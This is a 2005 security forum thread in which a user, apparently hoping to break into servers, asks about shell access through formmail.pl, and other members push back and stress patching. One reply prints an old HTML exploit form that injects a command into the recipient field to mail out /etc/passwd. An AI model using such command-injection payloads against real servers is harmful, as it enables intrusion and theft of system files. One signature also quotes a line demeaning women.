formmail.pl
Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: formmail.pl

  1. #1
    Banned
    Join Date
    May 2005
    Posts
    11

    formmail.pl

    could i gain access to the server with this type of script, and perform commands like ls -al ?
    if so, what are the datas?
    Share on Google+

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190


    form = "form" like you fill out
    mail = e-mail

    ".pl" is not a Polish pornographic site it's Perl (the language, not the harbour)

    It is designed to let people fill out and e-mail forms on websites AFAIK.

    I really don't understand your question, as it is fairly specialist software.

    But I would recommend that you read the front page of this site a bit more carefully.
    Share on Google+

  3. #3
    Banned
    Join Date
    May 2005
    Posts
    11
    yep i have read, and discussion here is about web security
    most perl scripts can make anybody gain access to servers
    like count.cgi for example or awstats.pl, calendar.pl
    with this scripts somebody could view files and folders on certain servers
    Share on Google+

  4. #4
    Senior Member kr5kernel's Avatar
    Join Date
    Mar 2004
    Posts
    347
    Yep, there was a known vulbnerabiltiy in formmail that would allow one to execeute shell commands and abuse a mail server.

    here is a little blurb.
    http://www.ctssn.com/linux/formMailExploit.html
    kr5kernel
    (kr5kernel at hotmail dot com)
    Linux: Making Penguins Cool Since 1994.
    Share on Google+

  5. #5
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    Yeah, my point it is that it is probably way too specialised. It has been around quite a while, and I do believe that it could be exploited 3 or more years ago. I think that it has been beefed up a lot since then.

    I would check the current situation if you are going to use it on a website, as there may still be vulnerabilities. However, I suspect that you would need quite a lot more wrong with your site for it to be a serious problem.

    Sure there has been quite a lot of malware written in Perl, but remember it was written for that purpose, not as a form serving e-mail system

    My advice is if you are going to use it, make sure that EVERYTHING is patched, and do a bit of research. As I said there were problems 3 or 4 years ago.

    Share on Google+

  6. #6
    Banned
    Join Date
    May 2005
    Posts
    11
    was hoping for some shell access data for this type of script
    Share on Google+

  7. #7
    Senior Member kr5kernel's Avatar
    Join Date
    Mar 2004
    Posts
    347
    Why do you need shell access? When I want shell access I walk to the machine and utilize the keyboard.

    I take it this isn't your system.....
    kr5kernel
    (kr5kernel at hotmail dot com)
    Linux: Making Penguins Cool Since 1994.
    Share on Google+

  8. #8
    Senior Member
    Join Date
    Dec 2004
    Posts
    320
    ... his name is sploiterwannabe .... I don't think he has the highest intentions ... could be wrong
    The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare
    Share on Google+

  9. #9
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    the vulnerability in formmail.pl is an old ond dating back ti 2001. this was fixed with ver 1.06.

    <html><head><title>hack</title></head>
    <body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
    <input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
    <input type="submit" name="submit" value="submit">
    </form></body></html>

    here's some old css code.... it wont work. it did but not anymore. this is true for all the so called vulns you mentioned. when a hole is discovered it gets fixed it doesn't just sit around waiting for you.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
    Share on Google+

  10. #10
    In And Above Man Black Cluster's Avatar
    Join Date
    Feb 2005
    Posts
    912
    Abandon the chances of finding such a vulnerability nowadays .... Unless you are dealing with REALLY REALLY non-patched system and most importantly .. stupid admins
    \"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts\".....Spaf
    Everytime I learn a new thing, I discover how ignorant I am.- ... Black Cluster
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •